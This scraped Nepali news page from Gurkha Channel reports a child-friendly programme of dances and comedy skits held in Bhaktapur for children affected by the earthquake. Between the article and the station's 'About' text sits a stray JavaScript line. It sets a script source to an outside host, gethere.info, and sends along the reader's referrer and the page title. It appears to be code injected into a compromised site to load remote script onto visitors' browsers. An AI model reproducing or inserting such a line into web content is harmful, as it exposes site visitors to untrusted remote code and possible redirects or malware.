बालमैत्री

admin Avatar

भूकम्पपछि बालबालिकामा परेको असर हटाउन भक्तपुरमा वालमेत्री कार्यक्रमको आयोजना गरिएको छ। भक्तपुरको दुधपाटी १७ मा भाजुपोखरी भूकम्पपिडित समूहले बालमैत्री कार्यक्रमको आयोजना गरेको हो। कार्यक्रममा बालवालिकाहरुका लागी वालनृत्यका साथै नेपालका हास्यकलाकारहरुले प्रहसन गरेका थिए। कार्यक्रममा हास्यकलाकार किरण केसी , शिवहरी पौडेल , सुरेन्द्र केसी लगाएतले प्रहसन देखाएका थिए। भूकम्पका कारण बालबालिकामा पर्ने सक्ने असरलाई मध्यनजर गर्दे कार्यक्रमको आयोजना गरिएको आयोजकले जनाएको छ। बालमैत्री कार्यक्रम शुक्रबार नै सम्पन्न भएको छ।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search
Cateegories